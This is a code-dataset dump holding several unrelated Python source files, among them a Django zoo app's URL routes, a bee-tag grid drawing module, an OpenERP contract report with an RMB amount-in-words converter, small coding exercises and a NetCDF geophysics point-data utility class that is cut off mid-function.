seq_id
stringlengths
7
11
text
stringlengths
156
1.7M
repo_name
stringlengths
7
125
sub_path
stringlengths
4
132
file_name
stringlengths
4
77
file_ext
stringclasses
6 values
file_size_in_byte
int64
156
1.7M
program_lang
stringclasses
1 value
lang
stringclasses
38 values
doc_type
stringclasses
1 value
stars
int64
0
24.2k
dataset
stringclasses
1 value
pt
stringclasses
1 value
26994135313
from django.urls import path from Zoo import views import templates urlpatterns = [ path('login/', views.user_login, name='login'), path('logout/',views.logout, name='logout'), path('user_create/', views.user_create, name='user_create'), path('index/', views.index, name='index'), path('detail/<int:id>', views.animal_detail, name='animal_detail'), path('animal_delete/<int:id>/', views.animal_delete, name='animal_delete'), path('check/<int:id>', views.check, name='check'), path('search/', views.search, name='search'), path('search_filter/', views.search_filter, name='search_filter'), path('write_log/<int:id>/', views.write_log, name='write_log'), path('edit_log/<int:id>/', views.edit_log, name='edit_log'), path('log_delete/<int:id>/', views.log_delete, name='log_delete'), path('zone/<int:id>', views.zone, name='zone'), ]
klll2/Zoozoo1
Zoo/urls.py
urls.py
py
886
python
en
code
1
github-code
6
36647480067
import collections from .pybeesgrid import TAG_SIZE, NUM_CONFIGS, NUM_MIDDLE_CELLS from .pybeesgrid import GridGenerator, BadGridArtist, BlackWhiteArtist, \ MaskGridArtist, DepthMapArtist from .pybeesgrid import drawGrids from .pybeesgrid import INNER_BLACK_SEMICIRCLE, CELL_0_BLACK, CELL_1_BLACK, \ CELL_2_BLACK, CELL_3_BLACK, CELL_4_BLACK, CELL_5_BLACK, CELL_6_BLACK, \ CELL_7_BLACK, CELL_8_BLACK, CELL_9_BLACK, CELL_10_BLACK, CELL_11_BLACK, \ IGNORE, CELL_0_WHITE, CELL_1_WHITE, CELL_2_WHITE, CELL_3_WHITE, \ CELL_4_WHITE, CELL_5_WHITE, CELL_6_WHITE, CELL_7_WHITE, CELL_8_WHITE, \ CELL_9_WHITE, CELL_10_WHITE, CELL_11_WHITE, OUTER_WHITE_RING, \ INNER_WHITE_SEMICIRCLE import numpy as np import warnings TAG_ID = ['bits'] TAG_CONFIG = ['z_rotation', 'y_rotation', 'x_rotation', 'center', 'radius'] TAG_STRUCTURE = ['inner_ring_radius', 'middle_ring_radius', 'outer_ring_radius', 'bulge_factor', 'focal_length'] TAG_LABEL_NAMES = TAG_ID + TAG_CONFIG + TAG_STRUCTURE CONFIG_LABELS = ('z_rotation', 'y_rotation', 'x_rotation', 'center_x', 'center_y', 'radius') CONFIG_ROTS = ( CONFIG_LABELS.index('z_rotation'), CONFIG_LABELS.index('y_rotation'), CONFIG_LABELS.index('x_rotation'), ) CONFIG_CENTER = ( CONFIG_LABELS.index('center_x'), CONFIG_LABELS.index('center_y'), ) CONFIG_RADIUS = CONFIG_LABELS.index('radius') MASK = collections.OrderedDict([ ("INNER_BLACK_SEMICIRCLE", INNER_BLACK_SEMICIRCLE), ("CELL_0_BLACK", CELL_0_BLACK), ("CELL_1_BLACK", CELL_1_BLACK), ("CELL_2_BLACK", CELL_2_BLACK), ("CELL_3_BLACK", CELL_3_BLACK), ("CELL_4_BLACK", CELL_4_BLACK), ("CELL_5_BLACK", CELL_5_BLACK), ("CELL_6_BLACK", CELL_6_BLACK), ("CELL_7_BLACK", CELL_7_BLACK), ("CELL_8_BLACK", CELL_8_BLACK), ("CELL_9_BLACK", CELL_9_BLACK), ("CELL_10_BLACK", CELL_10_BLACK), ("CELL_11_BLACK", CELL_11_BLACK), ("IGNORE", IGNORE), ("CELL_0_WHITE", CELL_0_WHITE), ("CELL_1_WHITE", CELL_1_WHITE), ("CELL_2_WHITE", CELL_2_WHITE), ("CELL_3_WHITE", CELL_3_WHITE), ("CELL_4_WHITE", CELL_4_WHITE), ("CELL_5_WHITE", CELL_5_WHITE), ("CELL_6_WHITE", CELL_6_WHITE), ("CELL_7_WHITE", CELL_7_WHITE), ("CELL_8_WHITE", CELL_8_WHITE), ("CELL_9_WHITE", CELL_9_WHITE), ("CELL_10_WHITE", CELL_10_WHITE), ("CELL_11_WHITE", CELL_11_WHITE), ("OUTER_WHITE_RING", OUTER_WHITE_RING), ("INNER_WHITE_SEMICIRCLE", INNER_WHITE_SEMICIRCLE) ]) MASK_KEYS = list(MASK.keys()) CELLS_BLACK = MASK_KEYS[MASK_KEYS.index("CELL_0_BLACK"):MASK_KEYS.index("CELL_11_BLACK")+1] MASK_BLACK = ["INNER_BLACK_SEMICIRCLE"] + CELLS_BLACK CELLS_WHITE = MASK_KEYS[ MASK_KEYS.index("CELL_0_WHITE"): MASK_KEYS.index("CELL_11_WHITE")+1] MASK_WHITE = CELLS_WHITE + ["OUTER_WHITE_RING", "INNER_WHITE_SEMICIRCLE"] def dtype_tag_params(nb_bits=12, with_structure=False): keys = TAG_ID + TAG_CONFIG if with_structure: keys += TAG_STRUCTURE reps = {key: 1 for key in keys} reps['bits'] = nb_bits reps['center'] = 2 return [(key, "({},)float32".format(n)) for key, n in reps.items()] def draw_grids(params, with_structure='auto', scales=[1.], artist=None): def get_positions(keys): positions = {} i = 0 for name in keys: positions[name] = i i += len(params[name][0]) return positions, i def array_fill_by_keys(struct_arr, keys, positions, arr): for name in keys: b = positions[name] e = b + len(struct_arr[name][0]) arr[:, b:e] = struct_arr[name] if artist is None: artist = BlackWhiteArtist(0, 255, 0, 1) batch_size = len(params['bits']) positions, size = get_positions(TAG_ID + TAG_CONFIG) bits_and_config = np.zeros((batch_size, size), dtype=np.float32) array_fill_by_keys(params, TAG_ID + TAG_CONFIG, positions, bits_and_config) if with_structure == 'auto': with_structure = all([struct_key in params.dtype.names for struct_key in TAG_STRUCTURE]) if with_structure: struct_positions, struct_size = get_positions(TAG_STRUCTURE) structure = np.zeros((batch_size, struct_size), dtype=np.float32) array_fill_by_keys(params, TAG_STRUCTURE, struct_positions, structure) structure = np.ascontiguousarray(structure) else: structure = None bits_and_config = np.ascontiguousarray(bits_and_config) if structure is not None and (structure == 0).all(): warnings.warn( "draw_grids got a structure that is all zero. Did you use " "`dtype_tag_params(with_structure=True)`" " and forgot to set the structure?") assert bits_and_config.dtype == np.float32 assert bits_and_config.flags['C_CONTIGUOUS'] return drawGrids(bits_and_config, structure, artist, scales) def _normalize_angle(x): x %= 2*np.pi x = (x + 2*np.pi) % (2*np.pi) x[x > np.pi] -= 2*np.pi assert ((-np.pi <= x) & (x <= np.pi)).all() return x
berleon/pybeesgrid
python/beesgrid/__init__.py
__init__.py
py
5,325
python
en
code
0
github-code
6
23018030287
import time from openerp.report import report_sxw from openerp.osv import osv class report_common(report_sxw.rml_parse): def __init__(self, cr, uid, name, context=None): super(report_common, self).__init__(cr, uid, name, context=context) self.localcontext.update({ 'time': time, 'rmb_upper': self._rmb_upper, }) def _rmb_upper(self, value): """ 人民币大写 来自:http://topic.csdn.net/u/20091129/20/b778a93d-9f8f-4829-9297-d05b08a23f80.html 传入浮点类型的值返回 unicode 字符串 """ rmbmap = [u"零", u"壹", u"贰", u"叁", u"肆", u"伍", u"陆", u"柒", u"捌", u"玖"] unit = [u"分", u"角", u"元", u"拾", u"佰", u"仟", u"万", u"拾", u"佰", u"仟", u"亿", u"拾", u"佰", u"仟", u"万", u"拾", u"佰", u"仟", u"兆"] nums = map(int, list(str('%0.2f' % value).replace('.', ''))) words = [] zflag = 0 # 标记连续0次数,以删除万字,或适时插入零字 start = len(nums) - 3 for i in range(start, -3, -1): # 使i对应实际位数,负数为角分 if 0 != nums[start - i] or len(words) == 0: if zflag: words.append(rmbmap[0]) zflag = 0 words.append(rmbmap[nums[start - i]]) words.append(unit[i + 2]) elif 0 == i or (0 == i % 4 and zflag < 3): # 控制‘万/元’ words.append(unit[i + 2]) zflag = 0 else: zflag += 1 if words[-1] != unit[0]: # 结尾非‘分’补整字 words.append(u"整") return ''.join(words) class report_vehicle_contract(osv.AbstractModel): _name = 'report.vehicle_sales_contract_print.report_contract' _inherit = 'report.abstract_report' _template = 'vehicle_sales_contract_print.report_contract' _wrapped_report_class = report_common
QinerTech/vehicle_sales
vehicle_sales_contract_print/report/report.py
report.py
py
2,001
python
en
code
0
github-code
6
11481741965
import json import random while True: inp = input("> ") ints = {} with open('intents.json', 'r') as f: json.dump(f, ints) try: if ints[inp].type() == list: val = random.choice(ints[inp]) else: val = ints[inp] print(val) except: print("I don't understand.")
poopcoder/Game
chat/code.py
code.py
py
341
python
en
code
0
github-code
6
37080131599
def solution(s): from collections import deque answer = '' s = deque(s) while s: a = s.popleft() if answer: if answer[-1] == ' ': answer += a.upper() else: answer += a.lower() else: answer += a.upper() return answer
JeonggonCho/algorithm
프로그래머스/lv2/12951. JadenCase 문자열 만들기/JadenCase 문자열 만들기.py
JadenCase 문자열 만들기.py
py
327
python
en
code
0
github-code
6
24023635631
import sys def parse_text(start_state, rules_for_state, fileinput_gen, file=None): if file: f = open(file, 'w+') sys.stdout = f line_number = 1 state = start_state text = ''.join(fileinput_gen) start_index = 0 end_index = len(text) while start_index < end_index: best_len = 0 best_rule = None rules = rules_for_state[state] regex = text[start_index:end_index] for rule in rules: length = rule.automate.satisfies(regex) if length > best_len: best_len = length best_rule = rule if best_rule: accepted_text = regex[:best_len] if best_rule.vrati_se is not None: accepted_text = accepted_text[:best_rule.vrati_se] start_index += best_rule.vrati_se else: start_index += len(accepted_text) if best_rule.uniform_sign != '-': print(best_rule.uniform_sign, line_number, accepted_text, sep=' ') #regex or accepted_text if best_rule.udji_u_stanje: state = best_rule.udji_u_stanje if best_rule.novi_redak: line_number += 1 else: start_index += 1 f.close()
marinsokol5/ppj_lab
lab1_python/source/analizator/AnalizatorBackBone.py
AnalizatorBackBone.py
py
1,285
python
en
code
0
github-code
6
8649505528
# 10845 : 큐 import sys n = int(sys.stdin.readline()) # n 입력받기 arr = [] for i in range(n) : # n 번만큼 반복해서 명령어 입력받기 command = sys.stdin.readline().split() func = command[0] # func : 명령어 if len(command) == 2 : # push : 명령어와 숫자가 동시에 들어올 때 arr.append(command[1]) # arr 배열에 원소 추가 else : if func == 'pop' : # 명령어가 pop 일 때 if len(arr) != 0 : print(arr[0]) arr.pop(0) else : print(-1) elif func == 'size' : # 명령어가 size 일 때 print(len(arr)) elif func == 'empty' : # 명령어가 empty 일 때 print(1 if len(arr) == 0 else 0) elif func == 'front' : # 명령어가 front 일 때 print(arr[0] if len(arr) != 0 else -1) elif func == 'back' : # 명령어가 back 일 때 print(arr[-1] if len(arr) != 0 else -1) # pop() : 맨 마지막 원소 삭제 # pop(0) : 맨 처음 원소 삭제
kimhn0605/BOJ
Algorithm/자료 구조/10845.py
10845.py
py
1,146
python
ko
code
0
github-code
6
38760633775
import netCDF4 import numpy as np import numexpr as ne import math import os import sys import re import tempfile from collections import OrderedDict from pprint import pformat from scipy.interpolate import griddata from geophys_utils._crs_utils import transform_coords, get_utm_wkt, get_reprojected_bounds, get_spatial_ref_from_wkt from geophys_utils._transect_utils import utm_coords, coords2distance from geophys_utils._netcdf_utils import NetCDFUtils, METADATA_CRS from geophys_utils._polygon_utils import points2convex_hull from geophys_utils._concave_hull import concaveHull from shapely.geometry import shape from scipy.spatial.ckdtree import cKDTree from shapely.geometry import Polygon, MultiPoint, MultiPolygon from shapely.geometry.polygon import asPolygon from shapely.geometry.base import BaseGeometry from shapely.ops import transform import shapely.wkt import logging # Setup logging handlers if required logger = logging.getLogger(__name__) # Get logger logger.setLevel(logging.INFO) # Initial logging level for this module try: import memcache except ImportError: logger.debug('Unable to import memcache. AWS-specific functionality will not be enabled') memcache = None # Default number of points to read per chunk when retrieving data DEFAULT_READ_CHUNK_SIZE = 8192 # Set this to a number other than zero for testing POINT_LIMIT = 0 # Metadata shape generation parameters SHAPE_BUFFER_DISTANCE = 0.02 # Distance to buffer (kerf) shape out then in again (in degrees) SHAPE_OFFSET = 0.0005 # Distance to buffer (kerf) final shape outwards (in degrees) SHAPE_SIMPLIFY_TOLERANCE = 0.0005 # Length of shortest line in shape (in degrees) SHAPE_MAX_POLYGONS=5 SHAPE_MAX_VERTICES=1000 SHAPE_ORDINATE_DECIMAL_PLACES = 6 # Number of decimal places for shape vertex ordinates class NetCDFPointUtils(NetCDFUtils): ''' NetCDFPointUtils class to do various fiddly things with NetCDF geophysics point data files. ''' CACHE_VARIABLE_PARAMETERS = {'complevel': 4, 'zlib': True, 'fletcher32': True, 'shuffle': True, 'endian': 'little', } def __init__(self, netcdf_dataset, memcached_connection=None, enable_disk_cache=None, enable_memory_cache=True, cache_path=None, s3_bucket=None, debug=False): ''' NetCDFPointUtils Constructor @parameter netcdf_dataset: netCDF4.Dataset object containing a point dataset @parameter enable_disk_cache: Boolean parameter indicating whether local cache file should be used, or None for default @parameter enable_memory_cache: Boolean parameter indicating whether values should be cached in memory or not. @parameter debug: Boolean parameter indicating whether debug output should be turned on or not ''' # Start of init function - Call inherited constructor first super().__init__(netcdf_dataset=netcdf_dataset, debug=debug ) logger.debug('Running NetCDFPointUtils constructor') if memcache is not None: self.memcached_connection = memcached_connection else: self.memcached_connection = None self.s3_bucket = s3_bucket self.cache_path = cache_path or os.path.join(os.path.join(tempfile.gettempdir(), 'NetCDFPointUtils'), re.sub('\W', '_', os.path.splitext(self.nc_path)[0])) + '_cache.nc' self.cache_basename = os.path.join(self.cache_path, re.sub('\W', '_', os.path.splitext(self.nc_path)[0])) #logger.debug('self.cache_path') #logger.debug(self.cache_path) #logger.debug('self.cache_path: {}'.format(self.cache_path)) self.enable_memory_cache = enable_memory_cache # If caching is not explicitly specified, enable it for OPeNDAP access if enable_disk_cache is None: self.enable_disk_cache = self.opendap else: self.enable_disk_cache = enable_disk_cache # Initialise private property variables to None until set by property getter methods self._xycoords = None self._point_variables = None self._data_variable_list = None self._kdtree = None # Determine exact spatial bounds xycoords = self.xycoords xmin = np.nanmin(xycoords[:,0]) xmax = np.nanmax(xycoords[:,0]) ymin = np.nanmin(xycoords[:,1]) ymax = np.nanmax(xycoords[:,1]) # Create nested list of bounding box corner coordinates self.native_bbox = [[xmin, ymin], [xmax, ymin], [xmax, ymax], [xmin, ymax]] # Define bounds self.bounds = [xmin, ymin, xmax, ymax] self.point_count = self.netcdf_dataset.dimensions['point'].size #=========================================================================== # def __del__(self): # ''' # NetCDFPointUtils Destructor # ''' # if self.enable_disk_cache: # try: # cache_file_path = self._nc_cache_dataset.filepath() # self._nc_cache_dataset.close() # os.remove(cache_file_path) # except: # pass #=========================================================================== def fetch_array(self, source_variable, dest_array=None): ''' Helper function to retrieve entire 1D array in pieces < self.max_bytes in size @param source_variable: netCDF variable from which to retrieve data ''' source_len = source_variable.shape[0] pieces_required = int(math.ceil((source_variable[0].itemsize * source_len) / self.max_bytes)) max_elements = source_len // pieces_required # Reduce max_elements to fit within chunk boundaries if possible if pieces_required > 1 and hasattr(source_variable, '_ChunkSizes'): chunk_size = (source_variable._ChunkSizes if type(source_variable._ChunkSizes) in [int, np.int32] else source_variable._ChunkSizes[0] ) chunk_count = max(max_elements // chunk_size, 1) max_elements = min(chunk_count * chunk_size, max_elements) pieces_required = int(math.ceil(source_len / max_elements)) logger.debug('Fetching {} pieces containing up to {} {} array elements.'.format(pieces_required, max_elements, source_variable.name)) if dest_array is None: dest_array = np.zeros((source_len,), dtype=source_variable.dtype) # Copy array in pieces start_index = 0 while start_index < source_len: end_index = min(start_index + max_elements, source_len) logger.debug('Retrieving {} array elements {}:{}'.format(source_variable.name, start_index, end_index)) array_slice = slice(start_index, end_index) dest_array[array_slice] = source_variable[array_slice] start_index += max_elements return dest_array def get_polygon(self): ''' Returns GML representation of convex hull polygon for dataset ''' return 'POLYGON((' + ', '.join([' '.join( ['%.4f' % ordinate for ordinate in coordinates]) for coordinates in self.get_convex_hull()]) + '))' def get_spatial_mask(self, bounds, bounds_wkt=None): ''' Return boolean mask of dimension 'point' for all coordinates within specified bounds and CRS @parameter bounds: Either an iterable containing [<xmin>, <ymin>, <xmax>, <ymax>] or a shapely (multi)polygon @parameter bounds_wkt: WKT for bounds CRS. Defaults to dataset native CRS :return mask: Boolean array of size n ''' #TODO: Deal with this in a more high-level way POINT_CHUNK_SIZE = 1048576 # Number of points to check at any one time to keep memory usage down def get_intersection_mask(points, geometry): """ Determine if points lie inside (multi)polygon N.B: points and geometry must be in the same CRS :param points: 2 x n array of input coordinates :param geometry: (multi)polygon :return mask: Boolean array of size n """ mask = np.zeros(shape=(points.shape[0]), dtype=np.bool) chunk_start_index = 0 while chunk_start_index < len(points): chunk_end_index = min(chunk_start_index + POINT_CHUNK_SIZE, len(points)) logger.debug('Checking spatial containment for points {} to {} of {}'.format(chunk_start_index, chunk_end_index-1, len(points))) intersection_points = np.array(MultiPoint(points[slice(chunk_start_index, chunk_end_index)]).intersection(geometry)) #TODO: Find out if there's a better way of getting the mask from the intersection points # Note that this method would have some issues with duplicated coordinates, but there shouldn't be any logger.debug('Computing partial mask from {} intersection points'.format(len(intersection_points))) _x_values, x_indices, _x_intersection_indices = np.intersect1d(points.flatten()[0::2], intersection_points.flatten()[0::2], return_indices=True) _y_values, y_indices, _y_intersection_indices = np.intersect1d(points.flatten()[1::2], intersection_points.flatten()[1::2], return_indices=True) intersection_indices = np.intersect1d(x_indices, y_indices, return_indices=False) mask[intersection_indices] = True chunk_start_index = chunk_end_index return mask coordinates = self.xycoords # Don't transform these - do all spatial operations in native CRS #logger.debug('coordinates = {}'.format(coordinates)) if isinstance(bounds, BaseGeometry): # Process shapely (multi)polygon bounds if bounds_wkt is None: native_crs_bounds = bounds else: logger.debug('Original bounds = {}'.format(bounds)) native_crs_bounds = transform((lambda x, y: transform_coords([x, y], bounds_wkt, self.wkt)), bounds) logger.debug('native_crs_bounds = {}'.format(native_crs_bounds)) # Shortcut the whole process if the extents are within the bounds geometry if asPolygon(self.native_bbox).within(native_crs_bounds): logger.debug('Dataset is completely contained within bounds') return np.ones(shape=(len(coordinates),), dtype=np.bool) bounds_half_size = abs(np.array([native_crs_bounds.bounds[2] - native_crs_bounds.bounds[0], native_crs_bounds.bounds[3] - native_crs_bounds.bounds[1]])) / 2.0 bounds_centroid = np.array(native_crs_bounds.centroid.coords[0]) #logger.debug('bounds_half_size = {}, bounds_centroid = {}'.format(bounds_half_size, bounds_centroid)) # Limit the points checked to those within the same rectangular extent (for speed) # Set mask element to true for each point which is <= bounds_half_size distance from bounds_centroid mask = np.all(ne.evaluate("abs(coordinates - bounds_centroid) <= bounds_half_size"), axis=1) logger.debug('{}/{} points found in initial bounding box intersection'.format(np.count_nonzero(mask), len(coordinates))) # Apply sub-mask for all points within bounds geometry (mask[mask])[~get_intersection_mask(coordinates[mask], native_crs_bounds)] = False #logger.debug('Final shape mask = {}'.format(mask)) else: # Process four-element bounds iterable if possible assert len(bounds) == 4, 'Invalid bounds iterable: {}. Must be of form [<xmin>, <ymin>, <xmax>, <ymax>]'.format(bounds) native_crs_bounds = transform_coords(np.array(bounds).reshape((2,2)), bounds_wkt, self.wkt).reshape((4, 1)) # Transform as [xmin, ymin], [xmax, ymax]] if (self.bounds[0] >= native_crs_bounds[0] and self.bounds[1] >= native_crs_bounds[1] and self.bounds[2] <= native_crs_bounds[2] and self.bounds[3] <= native_crs_bounds[3] ): logger.debug('Dataset is completely contained within bounds') return np.ones(shape=(len(coordinates),), dtype=np.bool) bounds_half_size = abs(np.array([native_crs_bounds[2] - native_crs_bounds[0], native_crs_bounds[3] - native_crs_bounds[1]])) / 2.0 bounds_centroid = np.array([native_crs_bounds[0], native_crs_bounds[1]]) + bounds_half_size # Return true for each point which is <= bounds_half_size distance from bounds_centroid mask = np.all(ne.evaluate("abs(coordinates - bounds_centroid) <= bounds_half_size"), axis=1) logger.debug('{}/{} points found in final mask'.format(np.count_nonzero(mask), len(coordinates))) return mask def grid_points(self, grid_resolution, variables=None, native_grid_bounds=None, reprojected_grid_bounds=None, resampling_method='linear', grid_wkt=None, point_step=1): ''' Function to grid points in a specified bounding rectangle to a regular grid of the specified resolution and crs @parameter grid_resolution: cell size of regular grid in grid CRS units @parameter variables: Single variable name string or list of multiple variable name strings. Defaults to all point variables @parameter native_grid_bounds: Spatial bounding box of area to grid in native coordinates @parameter reprojected_grid_bounds: Spatial bounding box of area to grid in grid coordinates @parameter resampling_method: Resampling method for gridding. 'linear' (default), 'nearest' or 'cubic'. See https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.griddata.html @parameter grid_wkt: WKT for grid coordinate reference system. Defaults to native CRS @parameter point_step: Sampling spacing for points. 1 (default) means every point, 2 means every second point, etc. @return grids: dict of grid arrays keyed by variable name if parameter 'variables' value was a list, or a single grid array if 'variable' parameter value was a string @return wkt: WKT for grid coordinate reference system. @return geotransform: GDAL GeoTransform for grid ''' assert not (native_grid_bounds and reprojected_grid_bounds), 'Either native_grid_bounds or reprojected_grid_bounds can be provided, but not both' # Grid all data variables if not specified variables = variables or self.point_variables # Allow single variable to be given as a string single_var = (type(variables) == str) if single_var: variables = [variables] if native_grid_bounds: reprojected_grid_bounds = get_reprojected_bounds(native_grid_bounds, self.wkt, grid_wkt) elif reprojected_grid_bounds: native_grid_bounds = get_reprojected_bounds(reprojected_grid_bounds, grid_wkt, self.wkt) else: # No reprojection required native_grid_bounds = self.bounds reprojected_grid_bounds = self.bounds # Determine spatial grid bounds rounded out to nearest GRID_RESOLUTION multiple pixel_centre_bounds = (round(math.floor(reprojected_grid_bounds[0] / grid_resolution) * grid_resolution, 6), round(math.floor(reprojected_grid_bounds[1] / grid_resolution) * grid_resolution, 6), round(math.floor(reprojected_grid_bounds[2] / grid_resolution - 1.0) * grid_resolution + grid_resolution, 6), round(math.floor(reprojected_grid_bounds[3] / grid_resolution - 1.0) * grid_resolution + grid_resolution, 6) ) grid_size = [pixel_centre_bounds[dim_index+2] - pixel_centre_bounds[dim_index] for dim_index in range(2)] # Extend area for points an arbitrary 4% out beyond grid extents for nice interpolation at edges expanded_grid_bounds = [pixel_centre_bounds[0]-grid_size[0]/50.0, pixel_centre_bounds[1]-grid_size[0]/50.0, pixel_centre_bounds[2]+grid_size[1]/50.0, pixel_centre_bounds[3]+grid_size[1]/50.0 ] spatial_subset_mask = self.get_spatial_mask(get_reprojected_bounds(expanded_grid_bounds, grid_wkt, self.wkt)) # Create grids of Y and X values. Note YX ordering and inverted Y # Note GRID_RESOLUTION/2.0 fudge to avoid truncation due to rounding error grid_y, grid_x = np.mgrid[pixel_centre_bounds[3]:pixel_centre_bounds[1]-grid_resolution/2.0:-grid_resolution, pixel_centre_bounds[0]:pixel_centre_bounds[2]+grid_resolution/2.0:grid_resolution] # Skip points to reduce memory requirements #TODO: Implement function which grids spatial subsets. point_subset_mask = np.zeros(shape=(self.netcdf_dataset.dimensions['point'].size,), dtype=bool) point_subset_mask[0:-1:point_step] = True point_subset_mask = np.logical_and(spatial_subset_mask, point_subset_mask) coordinates = self.xycoords[point_subset_mask] # Reproject coordinates if required if grid_wkt is not None: # N.B: Be careful about XY vs YX coordinate order coordinates = np.array(transform_coords(coordinates[:], self.wkt, grid_wkt)) # Interpolate required values to the grid - Note YX ordering for image grids = {} for variable in [self.netcdf_dataset.variables[var_name] for var_name in variables]: grids[variable.name] = griddata(coordinates[:,::-1], variable[:][point_subset_mask], #TODO: Check why this is faster than direct indexing (grid_y, grid_x), method=resampling_method) if single_var: grids = list(grids.values())[0] # crs:GeoTransform = "109.1002342895272 0.00833333 0 -9.354948067227777 0 -0.00833333 " geotransform = [pixel_centre_bounds[0]-grid_resolution/2.0, grid_resolution, 0, pixel_centre_bounds[3]+grid_resolution/2.0, 0, -grid_resolution ] return grids, (grid_wkt or self.wkt), geotransform def utm_grid_points(self, utm_grid_resolution, variables=None, native_grid_bounds=None, resampling_method='linear', point_step=1): ''' Function to grid points in a specified native bounding rectangle to a regular grid of the specified resolution in its local UTM CRS @parameter grid_resolution: cell size of regular grid in metres (UTM units) @parameter variables: Single variable name string or list of multiple variable name strings. Defaults to all point variables @parameter native_grid_bounds: Spatial bounding box of area to grid in native coordinates @parameter resampling_method: Resampling method for gridding. 'linear' (default), 'nearest' or 'cubic'. See https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.griddata.html @parameter grid_wkt: WKT for grid coordinate reference system. Defaults to native CRS @parameter point_step: Sampling spacing for points. 1 (default) means every point, 2 means every second point, etc. @return grids: dict of grid arrays keyed by variable name if parameter 'variables' value was a list, or a single grid array if 'variable' parameter value was a string @return wkt: WKT for grid coordinate reference system (i.e. local UTM zone) @return geotransform: GDAL GeoTransform for grid ''' native_grid_bounds = native_grid_bounds or self.bounds native_centre_coords = [(native_grid_bounds[dim_index] + native_grid_bounds[dim_index+2]) / 2.0 for dim_index in range(2)] utm_wkt = get_utm_wkt(native_centre_coords, self.wkt) return self.grid_points(grid_resolution=utm_grid_resolution, variables=variables, native_grid_bounds=native_grid_bounds, resampling_method=resampling_method, grid_wkt=utm_wkt, point_step=point_step ) def utm_coords(self, coordinate_array, wkt=None): ''' Function to convert coordinates to the appropriate UTM CRS @param coordinate_array: Array of shape (n, 2) or iterable containing coordinate pairs @param wkt: WKT for source CRS - default to native @return wkt: WKT for UTM CRS - default to native @return coordinate_array: Array of shape (n, 2) containing UTM coordinate pairs ''' wkt = wkt or self.wkt return utm_coords(coordinate_array, wkt) def coords2metres(self, coordinate_array, wkt=None): ''' Function to calculate cumulative distance in metres from coordinates in specified CRS @param coordinate_array: Array of shape (n, 2) or iterable containing coordinate pairs @param wkt: WKT for coordinate CRS - default to native @return distance_array: Array of shape (n) containing cumulative distances from first coord ''' wkt = wkt or self.wkt # Default to native CRS for coordinates _utm_wkt, utm_coord_array = utm_coords(coordinate_array, wkt) return coords2distance(utm_coord_array) def get_convex_hull(self, to_wkt=None): ''' Function to return vertex coordinates of a convex hull polygon around all points Implements abstract base function in NetCDFUtils @param to_wkt: CRS WKT for shape ''' return points2convex_hull(transform_coords(self.xycoords, self.wkt, to_wkt)) def get_concave_hull(self, to_wkt=None, smoothness=None, clockwise_polygon_orient=False): """\ Returns the concave hull (as a shapely polygon) of all points. Implements abstract base function in NetCDFUtils @param to_wkt: CRS WKT for shape @param smoothness: distance to buffer (kerf) initial shape outwards then inwards to simplify it """ hull = concaveHull(transform_coords(self.xycoords, self.wkt, to_wkt)) shapely_polygon = shape({'type': 'Polygon', 'coordinates': [hull.tolist()]}) # from shapely docs: # A sign of 1.0 means that the coordinates of the product’s exterior ring will be oriented # counter-clockwise and the interior rings (holes) will be oriented clockwise. # # There should not be polygons with interior ring holes and so -1 will be treated as clockwise, and 1 as # counter-clockwise if clockwise_polygon_orient: pol = shapely.geometry.polygon.orient(Polygon(shapely_polygon), -1.0) else: # reverse polygon coordinates - anti-clockwise pol = shapely.geometry.polygon.orient(Polygon(shapely_polygon), 1.0) if smoothness is None: return pol return Polygon(pol.buffer(smoothness).exterior).buffer(-smoothness) def nearest_neighbours(self, coordinates, wkt=None, points_required=1, max_distance=None, secondary_mask=None): ''' Function to determine nearest neighbours using cKDTree N.B: All distances are expressed in the native dataset CRS @param coordinates: two-element XY coordinate tuple, list or array @param wkt: Well-known text of coordinate CRS - defaults to native dataset CRS @param points_required: Number of points to retrieve. Default=1 @param max_distance: Maximum distance to search from target coordinate - STRONGLY ADVISED TO SPECIFY SENSIBLE VALUE OF max_distance TO LIMIT SEARCH AREA @param secondary_mask: Boolean array of same shape as point array used to filter points. None = no filter. @return distances: distances from the target coordinate for each of the points_required nearest points @return indices: point indices for each of the points_required nearest points ''' if wkt: reprojected_coords = transform_coords(coordinates, wkt, self.wkt) else: reprojected_coords = coordinates if secondary_mask is None: secondary_mask = np.ones(shape=(self.point_count,), dtype=bool) else: assert secondary_mask.shape == (self.point_count,) if max_distance: # max_distance has been specified logger.debug('Computing spatial subset mask...') spatial_mask = self.get_spatial_mask([reprojected_coords[0] - max_distance, reprojected_coords[1] - max_distance, reprojected_coords[0] + max_distance, reprojected_coords[1] + max_distance ] ) point_indices = np.where(np.logical_and(spatial_mask, secondary_mask ) )[0] if not len(point_indices): logger.debug('No points within distance {} of {}'.format(max_distance, reprojected_coords)) return [], [] # Set up KDTree for nearest neighbour queries logger.debug('Indexing spatial subset with {} points into KDTree...'.format(np.count_nonzero(spatial_mask))) kdtree = cKDTree(data=self.xycoords[point_indices]) logger.debug('Finished indexing spatial subset into KDTree.') else: # Consider ALL points max_distance = np.inf kdtree = self.kdtree distances, indices = kdtree.query(x=np.array(reprojected_coords), k=points_required, distance_upper_bound=max_distance) if max_distance == np.inf: return distances, indices else: # Return indices of complete coordinate array, not the spatial subset return distances, np.where(spatial_mask)[0][indices] def get_lookup_mask(self, lookup_value_list, lookup_variable_name='line', indexing_variable_name=None, indexing_dimension='point' ): ''' Function to return mask array based on lookup variable ''' if lookup_variable_name: lookup_variable = self.netcdf_dataset.variables[lookup_variable_name] if (lookup_variable.shape == () or ((len(lookup_variable.shape) == 1) and (lookup_variable.dtype == '|S1'))): # Scalar or string array dimension = self.netcdf_dataset.get(indexing_dimension) assert dimension, 'Invalid indexing_dimension {} specified'.format(indexing_dimension) # Repeat boolean value across dimension size return np.array([lookup_variable[:] in lookup_value_list] * dimension.size) indexing_variable_name = indexing_variable_name or lookup_variable_name + '_index' try: indexing_variable = self.netcdf_dataset.variables[indexing_variable_name] except: raise BaseException('indexing_variable_name not supplied and cannot be inferred') elif indexing_variable_name: indexing_variable = self.netcdf_dataset.variables[indexing_variable_name] if hasattr(indexing_variable, 'lookup'): # Get lookup variable name from variable attribute lookup_variable_name = indexing_variable.lookup elif indexing_variable_name.endswith('_index'): # Infer lookup variable name from indexing variable name lookup_variable_name = re.sub('_index$', '', indexing_variable_name) else: raise BaseException('lookup_variable_name not supplied and cannot be inferred') lookup_variable = self.netcdf_dataset.variables[lookup_variable_name] else: raise BaseException('Must supply either lookup_variable_name or indexing_variable_name') # 